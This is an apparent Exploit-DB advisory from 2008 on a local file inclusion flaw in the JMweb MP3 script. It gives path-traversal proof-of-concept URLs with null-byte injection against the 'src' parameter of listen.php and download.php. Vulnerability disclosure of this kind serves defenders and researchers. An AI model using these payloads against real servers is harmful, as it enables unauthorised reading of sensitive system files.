JMweb MP3 (src) Multiple Local File Inclusion

vendor:

JMweb MP3

by:

SirGod

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: JMweb MP3

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

JMweb MP3 (src) Multiple Local File Inclusion

JMweb MP3 is prone to a local file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view sensitive files from the underlying system that may aid in further attacks.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

#################################################################################################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
##################################################################################################

# Script Homepage:
# http://www.jesse-web.co.cc //

[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip

[+] Local File Inclusion

     Example  1 :

       http://[target]/[path]/listen.php?src=[Local File]%00

     PoC 1 :

       http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00


    Example 2 :

       http://[target]/[path]/download.php?src=[Local File]%00

    PoC 2 :

      http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00

##################################################################################################

# milw0rm.com [2008-10-04]